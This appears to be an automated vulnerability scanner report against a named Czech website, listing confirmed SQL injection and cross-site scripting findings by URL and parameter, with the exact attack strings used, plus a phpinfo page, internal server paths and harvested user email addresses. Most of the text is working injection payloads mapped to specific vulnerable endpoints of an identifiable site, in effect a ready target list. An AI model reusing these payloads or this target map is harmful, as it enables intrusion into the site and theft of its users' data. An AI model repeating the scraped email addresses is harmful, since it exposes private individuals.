- ||| SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- URL: http://www.prdel.cz/rubrika.php?rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/rubrika.php?s=18&rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/horoskop.php?h=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Parameter Name: h
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&vypsat=1
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?s=20&id='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: ' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/index_vypis.php?id=-1 OR 17-7=10
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- URL: http://www.prdel.cz/rubrika.php?rub='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id=%27
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/rubrika.php?s=18&rub='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/horoskop.php?h=%27
- Parameter Name: h
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id=%27&vypsat=1
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?s=20&id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id='+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: sheslo
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: sheslo
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_zapom.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?s=20&id='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&vypsat=3
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- URL: http://www.prdel.cz/rubrika.php?rub='"--></style></script><script>alert(0x000090)</script>
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000090)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122'"--></style></script><script>alert(0x0000B1)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: 122'"--></style></script><script>alert(0x0000B1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id='"--></style></script><script>alert(0x00013C)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00013C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id='"--></style></script><script>alert(0x000177)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000177)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000231)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: 122'"--></style></script><script>alert(0x000236)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/rubrika.php?s=18&rub='"--></style></script><script>alert(0x00024D)</script>
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00024D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00028D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00028E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00028F)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/centrum.php
- Parameter Name: centrum
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002B1)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/centrum.php
- Parameter Name: centrum
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0002F7)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00031D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00033C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: text
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000312)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000351)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000352)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000353)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: vec
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000356)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/ankety.php?s=15&rub='"--></style></script><script>alert(0x000379)</script>
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000379)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/horoskop.php?h='"--></style></script><script>alert(0x000380)</script>
- Parameter Name: h
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000380)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?id='"--></style></script><script>alert(0x0003E5)</script>&vypsat=1
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0003E5)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?s=20&id='"--></style></script><script>alert(0x000400)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000400)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: text
- Parameter Type: Post
- Attack Pattern: '"><net sparker=alert(0x00037F)>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000439)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00041E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: heslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00043A)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00043B)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: vec
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00043C)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004AA)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004AB)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Parameter Name: sheslo
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004CC)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_zapom.php
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004DC)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?s=20&id='"--></style></script><script>alert(0x00052D)</script>&vypsat=3
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00052D)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/kom_info.php?s=20&id=2&vypsat=3'"--></style></script><script>alert(0x000530)</script>
- Parameter Name: vypsat
- Parameter Type: Querystring
- Attack Pattern: 3'"--></style></script><script>alert(0x000530)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/prispevky.php?id=168
- Parameter Name: text
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004D8)</script>
- ||| [Possible] Cross-site Scripting
- Severity: Medium
- Confirmation: Confirmed
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- URL: http://www.prdel.cz/clanek.php?id='"--></style></script><script>alert(0x00009C)</script>
- Notes: This page responds with an HTTP redirect status, so the detected XSS vulnerability might not be exploitable
- in many conditions; however, it still indicates a lack of correct output filtering and should be addressed.
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x00009C)</script>
- Severity: Medium
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id='"--></style></script><script>alert(0x000201)</script>
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>netsparker(0x000201)</script>
- Severity: Medium
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Parameter Name: id
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>netsparker(0x000483)</script>
- ||| phpinfo() Information Disclosure
- Severity: Low
- Confirmation: Confirmed
- URL: http://www.prdel.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| File Upload Functionality Identified
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/registrace.php
- Form Name: ico
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/reg_edit.php
- Form Name: ico
- ||| MySQL Database Identified
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/rubrika.php?rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- Parameter Name: rub
- Parameter Type: Querystring
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- ||| Password Transmitted Over HTTP
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.prdel.cz/clanek.php?id=122
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- ||| E-mail Address Disclosure
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/
- Found E-mails: polibte.nam@prdel.cz
- costrova@prdel.cz
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/starsi_prispevky.php?co=
- Found E-mails: postreleny@gmail.com
- kanalnik987@seznam.cz
- admin@netlife.502.cz
- intelvodrazka@seznam.cz
- SexyRadaBieber@seznam.cz
- polibte.nam@prdel.cz
- ||| [Possible] Internal Path Leakage (*nix)
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.prdel.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/obj/usr/src/sys/GENERIC
- /usr/local/etc/php'
- /usr/local'
- /usr/local/man'
- /usr/local/info/'
- /usr/local/etc
- /usr/local/etc/php.ini
- /usr/local/etc/php
- /usr/local/etc/php/extensions.ini
- /var/log/php_errors.log
- /usr/local/lib/php/20090626
- /usr/local/share/pear
- /usr/sbin/sendmail -t -i
- /usr/sbin/sendmail
- /usr/home/costra/web/prdel.cz/www/phpinfo.php
- /usr/local/bin/php-cgi
- /usr/sbin:/usr/bin
- /usr/home/costra/web/prdel.cz/www
- ||| report db:
